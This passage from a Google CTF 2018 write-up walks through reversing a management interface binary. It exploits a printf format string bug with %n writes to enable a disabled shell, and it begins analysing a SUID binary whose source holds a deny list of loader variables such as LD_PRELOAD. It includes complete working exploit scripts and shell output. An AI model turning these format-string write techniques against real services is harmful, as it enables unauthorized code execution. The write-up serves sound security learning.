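    scrambled = xor_bytes(password)  # computed, but not used in the decision
    return len(password) == 35


print(secondary_login_accepts(b"A" * 35))
print(secondary_login_accepts(b"admin"))
print(xor_bytes(xor_bytes(b"admin")))
```

The last line also shows that XOR with a fixed key undoes itself when applied twice, which is the property that lets us decode any data stored in xored form.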

Let’s test this theory!

root@kali:~/Google-CTF/Admin UI# perl -e 'print "A"x35'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Authenticated
> 

Hurrah, we found an authorization bypass! This is great… but we need to find the flag. Let’s look back into the binary where we left off.

Notice that the compare routine is comparing our XORed password with _ZL4FLAG, which is our flag! Even though it’s only checking the length, we want to extract the flag.

So before we go and extract the flag, let’s see what the C code for this part of the application looks like. It should look like the following:

bool v0;
char password[128];
size_t l;
size_t i;

puts("Two factor authentication required !");
puts("Please enter secret secondary password:");
scanf("%127s", password);
l = strlen(password);
for (i = 0LL; i < l; ++i)
   password[i] ^= 0xC7u;
v0 = 0;
if (l == 35)
{
   *(_QWORD *)password = *(_QWORD *)FLAG;
   *(_QWORD *)&password[8] = *(_QWORD *)&FLAG[8];
   *(_QWORD *)&password[16] = *(_QWORD *)&FLAG[16];
   *(_QWORD *)&password[24] = *(_QWORD *)&FLAG[24];
   *(_QWORD *)&password[32] = *(_QWORD *)&FLAG[32];
   password[34] = FLAG[34];
   if (password)
      v0 = 1;
}
if (!v0)
{
   puts("Access denied.");
   exit(1);
}
puts("Authenticated");

Great, knowing that, let’s XOR the stored FLAG bytes with hex C7 to recover the second flag. We can extract the scrambled bytes by locating the FLAG data in the Hex View.

We can then write a simple Python program that will do all the work for us and print our xored flag.

flag = """
84 93 81 BC 93 B0 A8 98  97 A6 B4 94 B0 A8 B5 83
BD 98 85 A2 B3 B3 A2 B5  98 B3 AF F3 A9 98 F6 98
AC F8 BA
"""

flag = bytearray(flag.replace(" ", "").replace("\n", "").decode("hex"))
output = ""
for ch in flag:
	output += chr(ch ^ 0xC7)

print output

Executing the script should give us the following output.

root@kali:~/Google-CTF/Admin UI# python xor.py 
CTF{Two_PasSworDz_Better_th4n_1_k?}
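
The script above relies on Python 2 features (str.decode("hex") and the print statement). For anyone following along on Python 3, a minimal equivalent sketch is shown below; the names FLAG_HEX and decode_flag are my own, and the bytes are the same ones copied from the Hex View.

```python
# Scrambled bytes copied from the Hex View dump used in the script above.
FLAG_HEX = """
84 93 81 BC 93 B0 A8 98  97 A6 B4 94 B0 A8 B5 83
BD 98 85 A2 B3 B3 A2 B5  98 B3 AF F3 A9 98 F6 98
AC F8 BA
"""
KEY = 0xC7  # XOR constant from the loop in the binary


def decode_flag(hex_dump: str, key: int = KEY) -> str:
    """Strip all whitespace, parse the hex bytes and XOR each with the key."""
    raw = bytes.fromhex("".join(hex_dump.split()))
    return bytes(b ^ key for b in raw).decode("ascii")


if __name__ == "__main__":
    print(decode_flag(FLAG_HEX))
```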

Awesome, so it seems we got our second flag! Let’s test it and make sure that it works!

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
CTF{Two_PasSworDz_Better_th4n_1_k?}
Authenticated
>

It works, that’s the correct flag!

FLAG: CTF{Two_PasSworDz_Better_th4n_1_k?}

Admin UI 3

Upon reading the challenge description we learn that the code quality for this application is horrible and that the Q/A is just bad all around. We also learn that they choose to measure their temperature in “Kevins” rather than “Kelvins”. One thing that really stands out is the comment that we can bet “they can’t handle their memory properly”, which hints at a memory corruption issue.

Okay, so let’s see if we can’t find a buffer overflow or something similar in the application once authenticated.

root@kali:~/Google-CTF/Admin UI# nc mngmnt-iface.ctfcompetition.com 1337
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
CTF{Two_PasSworDz_Better_th4n_1_k?}
Authenticated
> ls
Unknown command 'ls'
> id
Unknown command 'id'
> whoami
Unknown command 'whoami'

Hmm… nothing seems to work. Let’s look back into the binary via IDA and see if we can’t find any commands that can help us.

Once back in IDA let’s look for the string “Authenticated” and follow the cross references. We should then be presented with the following.

Let’s double click on the _Z12command_linev call to see its graph view.

Right from the start we can spot two commands that we can run: quit and version.

> version
Version 0.3
> quit
Bye!
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit

But these don’t provide us with much… so let’s look deeper into the graph and see what else we can find.

Right below the version command we spot three more commands: shell, echo and debug. All of these are very interesting, especially the shell command. Let’s see what they do.

> shell
Security made us disable the shell, sorry!
> echo test
test
> debug
Debug data dump:
 pid=1 cmds executed=0x41616134->2 Mappings:
00400000-00401000 r-xp 00000000 08:01 534875                             /home/user/main
41414000-41415000 r-xp 00014000 08:01 534875                             /home/user/main
41615000-41616000 r--p 00015000 08:01 534875                             /home/user/main
41616000-41617000 rw-p 00016000 08:01 534875                             /home/user/main
42748000-4277a000 rw-p 00000000 00:00 0                                  [heap]
7f6cddba3000-7f6cddd63000 r-xp 00000000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddd63000-7f6cddf63000 ---p 001c0000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddf63000-7f6cddf67000 r--p 001c0000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddf67000-7f6cddf69000 rw-p 001c4000 08:01 537787                     /lib/x86_64-linux-gnu/libc-2.23.so
7f6cddf69000-7f6cddf6d000 rw-p 00000000 00:00 0
7f6cddf6d000-7f6cddf83000 r-xp 00000000 08:01 537808                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f6cddf83000-7f6cde182000 ---p 00016000 08:01 537808                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f6cde182000-7f6cde183000 rw-p 00015000 08:01 537808                     /lib/x86_64-linux-gnu/libgcc_s.so.1
7f6cde183000-7f6cde28b000 r-xp 00000000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde28b000-7f6cde48a000 ---p 00108000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde48a000-7f6cde48b000 r--p 00107000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde48b000-7f6cde48c000 rw-p 00108000 08:01 537819                     /lib/x86_64-linux-gnu/libm-2.23.so
7f6cde48c000-7f6cde5fe000 r-xp 00000000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde5fe000-7f6cde7fe000 ---p 00172000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde7fe000-7f6cde808000 r--p 00172000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde808000-7f6cde80a000 rw-p 0017c000 08:01 540467                     /usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.21
7f6cde80a000-7f6cde80e000 rw-p 00000000 00:00 0
7f6cde80e000-7f6cde834000 r-xp 00000000 08:01 537767                     /lib/x86_64-linux-gnu/ld-2.23.so
7f6cdea2b000-7f6cdea31000 rw-p 00000000 00:00 0
7f6cdea33000-7f6cdea34000 r--p 00025000 08:01 537767                     /lib/x86_64-linux-gnu/ld-2.23.so
7f6cdea34000-7f6cdea35000 rw-p 00026000 08:01 537767                     /lib/x86_64-linux-gnu/ld-2.23.so
7f6cdea35000-7f6cdea36000 rw-p 00000000 00:00 0
7fff3f482000-7fff3f4a3000 rw-p 00000000 00:00 0                          [stack]
7fff3f59b000-7fff3f59e000 r--p 00000000 00:00 0                          [vvar]
7fff3f59e000-7fff3f5a0000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
>

Okay so it seems that the shell functionality is disabled… what a shame! But on the other hand debug gives us the process memory mappings and addresses that we can use to our advantage.

I want to see if we can enable the shell command somehow. So let’s follow the shell command in IDA to see what it does and why it’s disabled.

Looking into this, it seems that the _ZL13shell_enabled variable holds 0, or false, which in turn leads to the “Security made us disable the shell…” message.

But we can also see that if this variable were true, the _Z11debug_shellv function would be called, which in turn should give us a debug shell on the system.

So the question is, where and how can we enable this? Is there a buffer overflow that we can exploit to call this function?

Well before we start hunting for buffer overflows and memory corruption issues, let’s first see if the binary is using any mitigations that might impact our work. For this we will use a tool called checksec.

root@kali:~/Google-CTF/Admin UI# checksec main.bin
[*] '/root/Google-CTF/Admin UI/main.bin'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Unfortunately for us NX is enabled, which prevents us from executing code from the stack. On the other hand the binary was built without PIE, so the addresses we see inside the binary itself should be the same on the remote system.

So let’s take a look and see what address the _ZL13shell_enabled variable is located at.

Looking at this, if we can somehow set the variable at address 41616138 to 1 then we can get into the shell… but how?
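
As a quick sanity check, we can confirm that this address falls inside a writable mapping from the debug dump. Below is a small Python 3 sketch of that check; the three /home/user/main lines are copied from the dump above (with the column spacing collapsed), and the helper name find_mapping is made up for illustration.

```python
# Mappings of /home/user/main copied from the "debug" output above.
MAPS = """\
41414000-41415000 r-xp 00014000 08:01 534875 /home/user/main
41615000-41616000 r--p 00015000 08:01 534875 /home/user/main
41616000-41617000 rw-p 00016000 08:01 534875 /home/user/main
"""
TARGET = 0x41616138  # address of _ZL13shell_enabled as seen in IDA


def find_mapping(maps_text: str, address: int):
    """Return (permissions, start, end) of the mapping containing address."""
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        start_s, end_s = fields[0].split("-")
        start, end = int(start_s, 16), int(end_s, 16)
        if start <= address < end:
            return fields[1], start, end
    return None


if __name__ == "__main__":
    perms, start, end = find_mapping(MAPS, TARGET)
    print("0x%x lies in 0x%x-0x%x (%s)" % (TARGET, start, end, perms))
```

The target sits in the rw-p region, so a write primitive pointed at it should be able to change the value.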

Well, there’s actually a way we can do that! Let’s take a look back at the echo function in IDA.

Notice that the echo function in the application passes our input directly to printf as the format string. There doesn’t seem to be any input sanitization occurring, which should allow us to carry out a format string attack.

Let’s test this theory!

=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1
Please enter the backdoo^Wservice password:
CTF{I_luv_buggy_sOFtware}
! Two factor authentication required !
Please enter secret secondary password:
CTF{Two_PasSworDz_Better_th4n_1_k?}
Authenticated
> echo %d %d %d %d 
1094798019 4 3 -702671040 
> echo %x %x %x %x
41414ac3 4 3 d61e1740

Awesome! So the echo function is in fact vulnerable to a format string attack!

What we can do from here is build a simple Python script that’ll log into the server, pass some data into echo, and then repeatedly apply the %x format specifier, which returns data as unsigned hexadecimal integers.

The reason we do this is because we want to learn where our argument is stored in memory. In this case I pass AAAABBBB before the format string buffer. If these characters are stored on the stack, we should see their hexadecimal representation, 4141414142424242, in the returned data.

From there, once we know where our echo argument is stored, we can simply enter the memory address of the _ZL13shell_enabled variable and use the %n format specifier to write to that memory address, thus enabling the shell.

The code that we will use can be seen below:

#!/usr/bin/env python2
from pwn import *
from struct import pack

r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")

r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}"

print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}"
print r.recvuntil("Authenticated")
print r.recvuntil(">")

buff = ' '.join(["%i=%%%i$x" % (i, i) for i in xrange(1, 50)])
buff = "AAAABBBB" + buff

r.send("echo %s\n" % buff)
print r.recvuntil(">")

r.send("quit\n")
r.send("3")

Executing the exploit script should give us the following output.

root@kali:~/Google-CTF/Admin UI# python exp.py
[+] Opening connection to mngmnt-iface.ctfcompetition.com on port 1337: Done
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1

Please enter the backdoo^Wservice password
CTF{I_luv_buggy_sOFtware}
:
! Two factor authentication required !
Please enter secret secondary password
CTF{Two_PasSworDz_Better_th4n_1_k?}
:
Authenticated

>
 AAAABBBB1=41414ac3 2=4 3=3 4=663ff740 5=2 6=0 7=0 8=0 9=0 10=0 11=0 12=0 13=0 14=0 15=0 16=74464f73 17=d5c2007d 18=0 19=0 20=0 21=0 22=0 23=0 24=6593c780 25=655eebff 26=6593b620 27=1 28=6593b6a3 29=d5c26d70 30=0 31=655f0409 32=d 33=6593b620 34=a 35=41414b86 36=d5c26d70 37=655f081b 38=6f686365 39=42424241 40=20782431 41=33207824 42=3d342078 43=253d3520 44=36253d36 45=2437253d 46=78243825 47=20782439 48=78243031 49=24313125
>
[*] Closed connection to mngmnt-iface.ctfcompetition.com port 1337

If we look closely at the format string output we will see that our data shows up around the 39th position, since 39=42424241 is the ASCII for BBBA (the bytes ABBB stored in little endian order).
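
To double check that reading, we can decode a few of the leaked words back into ASCII. The Python 3 sketch below uses three values copied from the output above; the helper names parse_leak and word_to_ascii are my own. Keep in mind that plain %x only prints the low 4 bytes of each 8-byte slot, which is why pieces of the command appear to be missing between positions.

```python
# Three "index=value" pairs copied from the leak output above.
LEAK = "38=6f686365 39=42424241 40=20782431"


def parse_leak(text: str) -> dict:
    """Turn 'index=hexword' pairs into a {index: hexword} dictionary."""
    return {int(idx): word
            for idx, word in (item.split("=") for item in text.split())}


def word_to_ascii(hex_word: str) -> str:
    """Decode a 32-bit value as the little endian bytes it occupies in memory."""
    return int(hex_word, 16).to_bytes(4, "little").decode("ascii")


if __name__ == "__main__":
    for index, word in sorted(parse_leak(LEAK).items()):
        print(index, repr(word_to_ascii(word)))
```

Position 38 decodes to the start of our command, which suggests the input buffer begins there.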

Knowing this we can start crafting our exploit. Notice that I insert A followed by %40$llx. The A character will be replaced with 1 later; since %n stores the number of characters printed so far, a single leading character makes it write the value 1 (making the shell check true). I used the ll length modifier with %x because this is a 64-bit binary and I want to work with the full 8-byte value at that position.

The letters ABCDEFGH are simply placeholders that will show me where I need to enter the memory address of the shell enable variable.

The updated Python script should look like the following:

#!/usr/bin/env python2
from pwn import *
from struct import pack

r = remote('mngmnt-iface.ctfcompetition.com',1337)
print r.recvuntil("3) Quit")

r.send("1\n\n")
print "1"
print r.recvuntil("password")
r.send("CTF{I_luv_buggy_sOFtware}\n")
print "CTF{I_luv_buggy_sOFtware}"

print r.recvuntil("password")
r.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print "CTF{Two_PasSworDz_Better_th4n_1_k?}"
print r.recvuntil("Authenticated")
print r.recvuntil(">")

buff = "A%40$llxABCDEFGH"

r.send("echo %s\n" % buff)
print r.recvuntil(">")

r.send("quit\n")
r.send("3")

Once updated, let’s go ahead and execute the script.

root@kali:~/Google-CTF/Admin UI# python test.py 
[+] Opening connection to mngmnt-iface.ctfcompetition.com on port 1337: Done
=== Management Interface ===
 1) Service access
 2) Read EULA/patch notes
 3) Quit
1

Please enter the backdoo^Wservice password
CTF{I_luv_buggy_sOFtware}
:
! Two factor authentication required !
Please enter secret secondary password
CTF{Two_PasSworDz_Better_th4n_1_k?}
:
Authenticated

>
 A4847464544ABCDEFGH
>
[*] Closed connection to mngmnt-iface.ctfcompetition.com port 1337

From the output, notice that 4847464544, or HGFED in hex, appears. This is the region where we will store the memory address of the _ZL13shell_enabled variable.
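
We can reproduce that value offline to understand why the letters ABC act as padding. The Python 3 sketch below assumes, based on the earlier leak where position 38 decoded to "echo", that the command line starts at position 38 and that each position covers 8 bytes; it also assumes the bytes after the end of the command are zero. The names slot_value, FIRST_SLOT and SLOT_SIZE are my own.

```python
FIRST_SLOT = 38  # assumption: position 38 is where the "echo ..." line begins
SLOT_SIZE = 8    # each positional argument covers 8 bytes on a 64-bit target


def slot_value(command: bytes, index: int) -> int:
    """Return the 64-bit little endian value that %<index>$llx would print."""
    offset = (index - FIRST_SLOT) * SLOT_SIZE
    # Assumption: whatever follows the command in the buffer is zero bytes.
    chunk = command[offset:offset + SLOT_SIZE].ljust(SLOT_SIZE, b"\x00")
    return int.from_bytes(chunk, "little")


if __name__ == "__main__":
    command = b"echo A%40$llxABCDEFGH"
    # "echo A%40$llxABC" is exactly 16 bytes, so position 40 starts at "D"
    print(format(slot_value(command, 40), "x"))
```

Under those assumptions the sketch prints the same 4847464544 that the server returned, which tells us the address has to start right after ABC.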

For the final script, we will replace the first A character in the buff variable with 1 and switch %40$llx to %40$lln, since we want the shell enable variable to evaluate to true, and we will replace everything after the C character with the memory address.

Note that since this is a 64-bit application, we need to pass the full memory address of 0x0000000041616138, and since the x86 and x64 architectures are little endian, we have to write the bytes of the memory address in reverse order, as seen in the script.
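
Rather than reversing the bytes by hand, the address can be packed with the struct module. The following Python 3 sketch builds the echo line offline (nothing is sent anywhere); build_payload and its parameters are hypothetical helpers of mine, and the assumption that the command starts at position 38 comes from the earlier leak.

```python
import struct

SHELL_ENABLED_ADDR = 0x41616138  # address of _ZL13shell_enabled from IDA


def build_payload(address: int, slot: int = 40, first_slot: int = 38) -> bytes:
    """Build the echo line so the packed address lands exactly on `slot`."""
    # One printed character ("1") before %n means the value 1 gets written.
    prefix = b"echo 1%" + str(slot).encode("ascii") + b"$lln"
    target_offset = (slot - first_slot) * 8
    pad_len = target_offset - len(prefix)
    if pad_len < 0:
        raise ValueError("prefix is longer than the offset of the chosen slot")
    filler = (b"ABC" * pad_len)[:pad_len]  # padding up to the 8-byte boundary
    # "<Q" packs an unsigned 64-bit integer in little endian byte order.
    return prefix + filler + struct.pack("<Q", address) + b"\n"


if __name__ == "__main__":
    print(repr(build_payload(SHELL_ENABLED_ADDR)))
```

With the default arguments this produces the same bytes that are hardcoded in the final script.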

As a side note, I updated the exploit script to use telnetlib because I was having issues getting a shell using the pwntools library.

The final exploit script is shown below:

import socket
import telnetlib

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("mngmnt-iface.ctfcompetition.com", 1337))
print s.recv(1000)

s.send("1\n")
print s.recv(1000)

s.send("CTF{I_luv_buggy_sOFtware}\n")
print s.recv(1000)

s.send("CTF{Two_PasSworDz_Better_th4n_1_k?}\n")
print s.recv(1000)

buff  = "echo 1%40$llnABC\x38\x61\x61\x41\x00\x00\x00\x00\n"
s.send(buff)

t = telnetlib.Telnet()
t.sock = s
t.interact()

Alright, now that we have everything in place, let’s fire off this script and hope for the best!

root@kali:~/Google-CTF/Admin UI# python exp.py 
=== Management Interface ===

 1) Service access
 2) Read EULA/patch notes
 3) Quit

Please enter the backdoo^Wservice password:

! Two factor authentication required !
Please enter secret secondary password:

Authenticated
> 1ABC8aaA
> shell
id
uid=1337(user) gid=1337(user) groups=1337(user)

Awesome! We were able to write to the shell enable variable in memory and can now execute shell commands!

Let’s see if we can’t find our flag.

ls -la
total 144
drwxr-xr-x 3 user   user      4096 Oct 24 19:06 .
drwxr-xr-x 3 nobody nogroup   4096 Oct 16 15:10 ..
-rw-r--r-- 1 user   user       220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 user   user      3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 user   user       655 May 16  2017 .profile
-rw-r--r-- 1 nobody nogroup     26 Sep 26 15:44 an0th3r_fl44444g_yo
-rw-r--r-- 1 nobody nogroup     25 Sep 26 15:44 flag
-rwxr-xr-x 1 nobody nogroup 111128 Sep 26 15:44 main
drwxr-xr-x 2 nobody nogroup   4096 Oct 24 19:06 patchnotes
cat an0th3r_fl44444g_yo
CTF{c0d3ExEc?W411_pL4y3d}

Finally, we got the flag!

FLAG: CTF{c0d3ExEc?W411_pL4y3d}

Closing

That’s it for the first part of the PWN challenges! The Admin UI challenges were somewhat complex, but weren’t overly complicated. If you understood some basic x86 Assembly and the basics of memory corruption issues then you should have been fine!

With that said, I hope you enjoyed this part of the PWN challenges! Stay tuned for Part 2, where we’ll cover the final PWN challenges!

Thanks for reading!

Google CTF (2018): Beginners Quest - PWN Solutions (2/2)

1 March 2019 at 00:00

In my previous post “Google CTF (2018): Beginners Quest - PWN Solutions (1/2)”, we covered the first set of PWN solutions for the Beginners Quest, which touched on topics such as code injection, reverse engineering, buffer overflows, and format string exploits.

In this post, we will continue our journey into the world of pwnage and exploitation. The final set of PWN solutions will cover topics such as race conditions, out-of-bound reads, write-what-where conditions, and of course more buffer overflows.

Now, before I delve too deep into these topics and solutions I need to put out a fair warning. These challenges were meant for beginners, and truthfully they’re pretty easy once you have a decent understanding of buffer overflows, exploitation, and code review, especially when you know what’s going on in the application. The only issue I encountered with this part of the solutions is that you really need to spend a ton of time Googling and learning about Linux internals, shared libraries, memory offsets and more.

If you’re unfamiliar with what I mentioned above, then I suggest you go look at the resources I shared in my previous posts to learn about these topics. As always, I’ll try to explain the best I can and provide links to external resources, but I highly suggest some previous experience and knowledge in exploitation before delving deep into these solutions.

With that being said, let’s cut to the chase and dive right in!

Filter Env

After reading the challenge description we learn that our previous exploit turned up the credentials for the Smartfridge2000, but we aren’t able to read the file, only the root user can. We also learn that there is a weird SUID binary that looks exploitable, so we will do just that!

First things first, let’s connect to the env.ctfcompetition.com server on port 1337 via netcat to see what we have to work with.

root@kali:~/Google-CTF/Filter Env# nc env.ctfcompetition.com 1337
ls -al
total 76
drwxr-xr-x  21 user   user    4096 Oct 24 19:10 .
drwxr-xr-x  21 user   user    4096 Oct 24 19:10 ..
-rwxr-xr-x   1 nobody nogroup    0 Oct 24 19:04 .dockerenv
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 bin
drwxr-xr-x   2 nobody nogroup 4096 Apr 12  2016 boot
drwxr-xr-x   4 nobody nogroup 4096 Oct 24 19:04 dev
drwxr-xr-x  42 nobody nogroup 4096 Oct 24 19:04 etc
drwxr-xr-x   4 nobody nogroup 4096 Jun  6  2018 home
drwxr-xr-x   8 nobody nogroup 4096 Sep 13  2015 lib
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 lib64
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 media
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 mnt
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 opt
dr-xr-xr-x 111 nobody nogroup    0 Feb  9 21:41 proc
drwx------   2 nobody nogroup 4096 Apr 17  2018 root
drwxr-xr-x   5 nobody nogroup 4096 Apr 17  2018 run
drwxr-xr-x   2 nobody nogroup 4096 Apr 27  2018 sbin
drwxr-xr-x   2 nobody nogroup 4096 Apr 17  2018 srv
drwxr-xr-x   2 nobody nogroup 4096 Feb  5  2016 sys
drwxrwxrwt   2 user   user      40 Feb  9 21:41 tmp
drwxr-xr-x  10 nobody nogroup 4096 Apr 17  2018 usr

Nothing too interesting in the root folder, let’s see what’s in the home folders.

cd /home
ls -la
total 16
drwxr-xr-x  4 nobody nogroup 4096 Jun  6  2018 .
drwxr-xr-x 21 user   user    4096 Oct 24 19:10 ..
drwxr-xr-x  2 nobody nogroup 4096 Jun 14  2018 adminimum
drwxr-xr-x  3 nobody nogroup 4096 Jun 14  2018 user
cd adminimum
ls -la
total 40
drwxr-xr-x 2 nobody    nogroup    4096 Jun 14  2018 .
drwxr-xr-x 4 nobody    nogroup    4096 Jun  6  2018 ..
-rw-r--r-- 1 nobody    nogroup     220 Aug 31  2015 .bash_logout
-rw-r--r-- 1 nobody    nogroup    3771 Aug 31  2015 .bashrc
-rw-r--r-- 1 nobody    nogroup     655 May 16  2017 .profile
-rwsr-xr-x 1 adminimum adminimum 13648 Jun 14  2018 filterenv
-r-------- 1 adminimum adminimum    19 May 24  2018 flag

Okay, so we see that the adminimum user has the flag file and an interesting binary named filterenv. Let’s see what happens when we execute the binary.

./filterenv
[*] waiting for new environment
test
test
test
test
test

/bin/bash: line 6:     6 Segmentation fault      (core dumped) ./filterenv

Segmentation fault? Interesting, I wonder if we can exploit this to get a shell as the user to read the flag. At the same time I notice that the application is waiting for a new environment, so I’m guessing this also has something to do with environmental variables.

Alright, with that in mind let’s go ahead and download the attachment, and extract the files. We should then be presented with the following C code.

root@kali:~/Google-CTF/Filter Env# ls
filterenv.c
root@kali:~/Google-CTF/Filter Env# file filterenv.c 
filterenv.c: C source, ASCII text

Upon opening the source code, we are presented with the following.

#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;
static char *unsafe[] = {
  "GCONV_PATH\x00",
  "GETCONF_DIR\x00",
  "HOSTALIASES\x00",
  "LD_AOUT_LIBRARY_PATH\x00",
  "LD_AOUT_PRELOAD\x00",
  "LD_AUDIT\x00",
  "LD_DEBUG\x00",
  "LD_DEBUG_OUTPUT\x00",
  "LD_DYNAMIC_WEAK\x00",
  "LD_LIBRARY_PATH\x00",
  "LD_ORIGIN_PATH\x00",
  "LD_PRELOAD\x00",
  "LD_PROFILE\x00",
  "LD_SHOW_AUXV\x00",
  "LD_USE_LOAD_BIAS\x00",
  "LOCALDOMAIN\x00",
  "LOCPATH\x00",
  "MALLOC_TRACE\x00",
  "NIS_PATH\x00",
  "NLSPATH\x00",
  "RESOLV_HOST_CONF\x00",
  "RES_OPTIONS\x00",
  "TMPDIR\x00",
  "TZDIR\x00",
  NULL,
};

static int lol(const void *a, const void *b)
{
  if ((unsigned long)a == (unsigned long)b)
    return 0;
  else if ((unsigned long)a > (unsigned long)b)
    return 1;
  else
    return -1;
}

static void shuffle(void)
{
  unsigned int n;
  char **q;

  n = 0;
  for (q = environ; *q != NULL; q++)
    n++;

  qsort(environ, n, sizeof(char *), lol);
}

/* reset unsafe variables */
static void filter_env(void)
{
  char **p;

  for (p = unsafe; *p != NULL; p++) {
    if (getenv(*p) != NULL) {
      if (setenv(*p, "", 1) != 0)
	err(1, "setenv");
    }
  }

  /* just be safe, prevent heap spraying attacks */
  shuffle();
}

static char **readenv(void)
{
  char **env = NULL;
  char line[1024];
  size_t len, n;

  n = 0;
  while (1) {
    if (fgets(line, sizeof(line), stdin) == NULL)
      break;

    len = strlen(line);
    if (len <= 1) {
      break;
    }

    if (++n > 32)
      errx(1, "can't allocate that much variables");

    env = realloc(env, n*sizeof(char*));
    if (env == NULL)
      err(1, "realloc");

    if (len > 0 && line[len-1] == '\n')
      line[len-1] = '\x00';

    env[n-1] = strdup(line);
    if (env[n-1] == NULL)
      err(1, "strdup");
  }

  if (env == NULL)
    errx(1, "no variable set\n");

  return env;
}

static void set_new_env(void)
{
  char **env;

  printf("[*] waiting for new environment\n");
  env = readenv();

  if (clearenv() != 0)
    err(1, "clearenv");

  environ = env;
  filter_env();
}

int main(void)
{
  char *arg[] = { "/usr/bin/id", NULL };

  setbuf(stdin, NULL);
  setbuf(stdout, NULL);
  setbuf(stderr, NULL);

  if (setreuid(geteuid(), geteuid()) != 0)
    err(1, "setreuid");

  set_new_env();

  if (execvp(arg[0], arg) != 0)
    err(1, "execvp");

  /* never reached */
  return 0;
}

Looking into the main function of the application we see that it does a few things. It sets both the real and effective user IDs to the current effective user ID via setreuid (for this SUID binary, that is the adminimum user) and then it calls the set_new_env() function.

Let’s see what that function does.

static void set_new_env(void)
{
  char **env;

  printf("[*] waiting for new environment\n");
  env = readenv();

  if (clearenv() != 0)
    err(1, "clearenv");

  environ = env;
  filter_env();
}

From here the application prints out the “waiting for…” line as we’ve seen already and stores the return value of the readenv() function in a new variable called env. It then clears the environment via the clearenv() function, assigns env to the libc global variable environ, and finally filters the environmental variables via the filter_env function.

Okay, let’s see what the readenv function does to get a better understanding of the application as a whole.

static char **readenv(void)
{
  char **env = NULL;
  char line[1024];
  size_t len, n;

  n = 0;
  while (1) {
    if (fgets(line, sizeof(line), stdin) == NULL)
      break;

    len = strlen(line);
    if (len <= 1) {
      break;
    }

    if (++n > 32)
      errx(1, "can't allocate that much variables");

    env = realloc(env, n*sizeof(char*));
    if (env == NULL)
      err(1, "realloc");

    if (len > 0 && line[len-1] == '\n')
      line[len-1] = '\x00';

    env[n-1] = strdup(line);
    if (env[n-1] == NULL)
      err(1, "strdup");
  }

  if (env == NULL)
    errx(1, "no variable set\n");

  return env;
}

From the top, the function reads in a line via the following code: if (fgets(line, sizeof(line), stdin) == NULL), with each line limited to the 1024-byte buffer declared as char line[1024].

The code seems to prevent allocation of more than 32 lines of environmental variables via the following if statement: if (++n > 32).

It then allocates space on the heap for the whole env variable via env = realloc(env, n*sizeof(char*)); which is just an array of character pointers, or strings. The strings are added to the array via env[n-1] = strdup(line).

In short, this loops and resizes the array on the heap for each new string via the realloc function call.
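
If the C is hard to follow, here is a rough Python 3 model of the same loop. It is only a sketch: the name read_env is my own, the 1024-byte fgets limit is not modelled, and a Python list tracks its own length, so the model cannot show how the C array is laid out in memory.

```python
import io

MAX_VARS = 32  # limit enforced by "if (++n > 32)"


def read_env(stream) -> list:
    """Read NAME=value lines until EOF or an empty line, like readenv()."""
    env = []
    while True:
        line = stream.readline()
        if len(line) <= 1:  # "" means EOF, "\n" is an empty line
            break
        if len(env) + 1 > MAX_VARS:
            raise ValueError("can't allocate that much variables")
        # Drop the single trailing newline, as the C code does
        env.append(line[:-1] if line.endswith("\n") else line)
    if not env:
        raise ValueError("no variable set")
    return env


if __name__ == "__main__":
    print(read_env(io.StringIO("FOO=bar\nFOO=baz\n\nIGNORED=1\n")))
```

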